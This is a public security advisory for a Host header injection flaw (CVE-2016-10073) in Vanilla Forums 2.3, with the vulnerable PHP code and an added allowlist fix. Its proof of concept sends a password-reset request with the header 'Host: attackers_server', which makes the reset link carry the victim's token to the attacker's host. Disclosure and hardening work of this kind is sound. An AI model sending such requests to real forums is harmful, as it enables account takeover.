=============================================
- Discovered by: Dawid Golunski
- dawid[at]legalhackers.com
- https://legalhackers.com

- CVE-2016-10073
- Release date: 11.05.2017
- Revision 1.0
- Severity: Medium
=============================================


I. VULNERABILITY
-------------------------

Vanilla Forums <= 2.3 Host Header Injection CVE-2016-10073 [0day]


II. BACKGROUND
-------------------------

"Community Forums Reinvented
Create an online community that your customers will love. Vanilla's forum 
software is used by top brands to engage customers, drive loyalty and reduce
support costs."

"Vanilla provides cloud and open source community forum software that powers 
discussion forums worldwide with close to 1M downloads. 
Built for flexibility and integration, Vanilla is the best, most powerful 
community solution in the world."

https://vanillaforums.com/en/software/
https://open.vanillaforums.com/


III. INTRODUCTION
-------------------------

Vanilla Forums software (including the latest stable version of 2.3 in
its default configuration) is affected by:

* Host Header Injection CVE-2016-10073 (0day)

which can be exploited by unauthenticated remote attackers to potentially
intercept the password reset hash and gain unauthorized access to the victim's
account, or to perform web-cache poisoning attacks.


IV. DESCRIPTION 
-------------------------


Vanilla Forums software, in its default configuration, makes use of the
user-supplied HTTP HOST header (CVE-2016-10073) when sending emails
from the host on which the forum was installed.

The HOST header is used to form the sender email address as we can see
in the following snippet of code:

------[ library/core/class.email.php ]------

...

public function from($SenderEmail = '', $SenderName = '', $bOverrideSender = false) {
    if ($SenderEmail == '') {
        // Use the configured support address if one is set ...
        $SenderEmail = c('Garden.Email.SupportAddress', '');
        if (!$SenderEmail) {
            // ... otherwise build it from the host of the current request,
            // i.e. from the client-supplied HTTP HOST header.
            $SenderEmail = 'noreply@'.Gdn::request()->host();
        }
    }

    if ($SenderName == '') {
        $SenderName = c('Garden.Email.SupportName', c('Garden.Title', ''));
    }

    if ($this->PhpMailer->Sender == '' || $bOverrideSender) {
        $this->PhpMailer->Sender = $SenderEmail;
    }

    ob_start();
    $this->PhpMailer->setFrom($SenderEmail, $SenderName, false);
    ob_end_clean();
    return $this;
}


...

-----------------------------------------


As we can see, by default Vanilla will use the 'noreply@HOST' address, where
HOST is obtained from the client's HTTP request.



V. PROOF OF CONCEPT
-------------------------

An attacker may use the HTTP HOST header to set the email domain to an arbitrary
host. For example, sending the following HTTP request:

------------

POST /vanilla2-3/entry/passwordrequest HTTP/1.1
Host: attackers_server
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Connection: close
Content-Length: 149

hpt=&Target=discussions&ClientHour=2017-05-10+22%3A00&Email=victim&Request+a+new+password=Request+a+new+password&DeliveryType=VIEW&DeliveryMethod=JSON

------------

will result in the following email sent to the victim:

------------

To: victim@victim-server.com
Subject: [Vanilla 2.3] Reset Your Password
X-PHP-Originating-Script: 0:class.phpmailer.php
Date: Thu, 11 May 2017 09:42:13 +0000
Return-Path: noreply@attackers_server
Message-ID: <a989e3868a609316dd9a7d7a991d79e5@attackers_server>
X-Mailer: PHPMailer 5.1 (phpmailer.sourceforge.net)
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Type: text/plain; charset="utf-8"

Vanilla 2.3 http://attackers_server/vanilla2-3/=0A=0A=0A=0AReset Your Passw=
ord=0A=0A=0A=0AWe've received a request to change your password at Vanilla =
2.3. If you didn't make this request, please ignore this email.=0A=0A=0A=0A=
Change My Password: http://attackers_server/vanilla2-3/entry/passwordreset/=
2/PdNvqaPnnFaG

------------


Because the HOST header was set to:

Host: attackers_server

the resulting email has the sender's address set to noreply@attackers_server.
The password reset link also contains the attacker's server, which could
allow the attacker to intercept the hash if the victim user clicked on the
malicious link.
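The following is an added example, not Vanilla's code, of how the sender-host
derivation in from() above (and the host used when building absolute links such
as the password reset link in the PoC) can be hardened: the client's HOST value
is accepted only if it matches a configured allowlist, otherwise a configured
canonical host is used. The config keys Garden.Email.CanonicalHost and
Garden.Email.AllowedHosts are hypothetical names chosen for this example;
Garden.Email.SupportAddress is the real key from the snippet above.

```php
<?php
// Added example, not Vanilla's code. Config keys CanonicalHost and
// AllowedHosts are hypothetical; SupportAddress is the key used in from().

function safeSenderHost(string $requestHost, array $config): string {
    $canonical = $config['Garden.Email.CanonicalHost'] ?? '';
    $allowed   = $config['Garden.Email.AllowedHosts'] ?? [];
    if ($canonical === '') {
        throw new RuntimeException('Garden.Email.CanonicalHost must be configured');
    }
    // Normalise: trim, drop an optional :port suffix, lower-case.
    $host = strtolower(preg_replace('/:\d+$/', '', trim($requestHost)));
    // Only an exact allowlist match is trusted; any other value (e.g. the
    // "attackers_server" from the PoC) falls back to the canonical host.
    if (in_array($host, array_map('strtolower', $allowed), true)) {
        return $host;
    }
    return $canonical;
}

function senderAddress(string $requestHost, array $config): string {
    // Prefer an explicitly configured support address, as the original from() does.
    $support = $config['Garden.Email.SupportAddress'] ?? '';
    if ($support !== '') {
        return $support;
    }
    return 'noreply@' . safeSenderHost($requestHost, $config);
}

// The same host should be used for absolute URLs in outgoing mail.
function resetLinkBase(string $requestHost, array $config): string {
    return 'https://' . safeSenderHost($requestHost, $config) . '/';
}

// Constructed demo configuration and request hosts.
$config = [
    'Garden.Email.SupportAddress' => '',
    'Garden.Email.CanonicalHost'  => 'forum.example.com',
    'Garden.Email.AllowedHosts'   => ['forum.example.com', 'www.forum.example.com'],
];
echo senderAddress('attackers_server', $config), PHP_EOL;      // falls back to canonical
echo senderAddress('forum.example.com:443', $config), PHP_EOL; // allowlisted, port stripped
echo resetLinkBase('attackers_server', $config), PHP_EOL;      // link never points elsewhere
```

Rejecting unknown HOST values at the web server as well (a default virtual host that returns an error) closes the same gap before the request reaches PHP.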



VI. BUSINESS IMPACT
-------------------------

With victim user interaction, an attacker could potentially intercept the
password reset hash.

This vulnerability may also lead to web-cache poisoning if the HOST header
is used to form links in web responses. See references for more details
on this vector.

 
VII. SYSTEMS AFFECTED
-------------------------

The latest stable release of Vanilla Forums available at the official website:

https://open.vanillaforums.com/addon/vanilla-core-2.3

was confirmed to be vulnerable. 
Previous versions are also likely to be vulnerable.

This vulnerability can also be combined with CVE-2016-10033 vulnerability 
to achieve Unauthenticated Remote Code Execution as described in a separate
advisory.

 
VIII. SOLUTION
-------------------------

This vulnerability was reported to Vanilla Forums support team in December
2016. Despite the acknowledgment of the issue by the team, it has remained 
unpatched for over 5 months. 
As there has been no progress or further updates, this advisory is finally 
released to the public without an official patch.

 
IX. REFERENCES
-------------------------

https://legalhackers.com

https://ExploitBox.io

https://twitter.com/Exploit_Box

Vendor site:
https://vanillaforums.com

Confirmed vulnerable stable version of Vanilla Forums 2.3:
https://open.vanillaforums.com/addon/vanilla-core-2.3
https://open.vanillaforums.com/discussion/32822/vanilla-2-3-is-now-available

Vanilla Forums RCE 0day exploit:
https://exploitbox.io/vuln/Vanilla-Forums-Exploit-RCE-0day-Remote-Code-Exec-CVE-2016-10033.html

https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10045-Vuln-Patch-Bypass.html
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html

Web-cache poisoning:
http://www.skeletonscribe.net/2013/05/practical-http-host-header-attacks.html



X. CREDITS
-------------------------

Discovered by

Dawid Golunski
dawid (at) legalhackers (dot) com

https://legalhackers.com
https://ExploitBox.io
 

XI. REVISION HISTORY
-------------------------

11.05.2017 - Advisory released, rev. 1
 
XII. LEGAL NOTICES
-------------------------

The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this information.